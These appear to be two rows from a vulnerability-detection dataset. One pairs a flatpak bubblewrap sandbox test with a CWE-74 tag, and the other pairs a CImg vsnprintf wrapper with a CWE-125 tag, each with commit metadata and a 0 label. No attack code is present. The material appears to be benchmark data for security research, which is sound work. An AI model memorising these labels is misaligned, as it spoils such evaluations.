g_assert_cmpstr (bwrap->argv->pdata[i++], ==, "bwrap"); i = assert_next_is_symlink (bwrap, i, abs_target, abs_link); i = assert_next_is_symlink (bwrap, i, "../2/target", rel_link); i = assert_next_is_bind (bwrap, i, "--bind", abs_target, abs_target); i = assert_next_is_bind (bwrap, i, "--bind", target, target); i = assert_next_is_dir (bwrap, i, create_dir); /* create_dir2 is not currently created with --dir inside the container * because it doesn't exist outside the container. * (Is this correct? For now, tolerate either way) */ if (i + 2 < bwrap->argv->len && g_strcmp0 (bwrap->argv->pdata[i], "--dir") == 0 && g_strcmp0 (bwrap->argv->pdata[i + 1], create_dir2) == 0) i += 2; i = assert_next_is_bind (bwrap, i, "--ro-bind", dont_hide, dont_hide); i = assert_next_is_bind (bwrap, i, "--ro-bind", expose_ro, expose_ro); /* We don't create a FAKE_MODE_TMPFS in the container unless there is * a directory on the host to mount it on. * Hiding $subdir/expose-ro/hide-me has to use --tmpfs because * $subdir/expose-ro *is* exposed. */ i = assert_next_is_tmpfs (bwrap, i, hide_below_expose); i = assert_next_is_bind (bwrap, i, "--bind", expose_rw, expose_rw); /* Hiding $subdir/hide just uses --dir, because $subdir is not * exposed. 
*/ i = assert_next_is_dir (bwrap, i, hide); while (i < bwrap->argv->len && bwrap->argv->pdata[i] != NULL) { /* An unknown number of --bind, --ro-bind and --symlink, * depending how your /usr and /etc are set up. * About the only thing we can say is that they are in threes. */ g_assert_cmpuint (i++, <, bwrap->argv->len); g_assert_cmpuint (i++, <, bwrap->argv->len); g_assert_cmpuint (i++, <, bwrap->argv->len); } g_assert_cmpuint (i, ==, bwrap->argv->len - 1); g_assert_cmpstr (bwrap->argv->pdata[i++], ==, NULL); g_assert_cmpuint (i, ==, bwrap->argv->len); glnx_shutil_rm_rf_at (-1, subdir, NULL, &error); if (error != NULL) { g_assert_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND); g_clear_error (&error); } }
0
[ "CWE-74" ]
flatpak
4108e022452303093d8b90c838695a0476cb09c7
139,559,460,823,970,690,000,000,000,000,000,000,000
204
context: Add --unset-env option and a corresponding override This follows up from GHSA-4ppf-fxf6-vxg2 to fix missing functionality that I noticed while resolving that vulnerability, but is not required for fixing the vulnerability. Signed-off-by: Simon McVittie <[email protected]>
inline int _vsnprintf(char *const s, const size_t size, const char *const format, va_list ap) { int result = -1; cimg::mutex(6); if (size) result = _vsnprintf_s(s,size,_TRUNCATE,format,ap); if (result==-1) result = _vscprintf(format,ap); cimg::mutex(6,0); return result; }
0
[ "CWE-125" ]
CImg
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
16,509,426,807,763,476,000,000,000,000,000,000,000
8
Fix other issues in 'CImg<T>::load_bmp()'.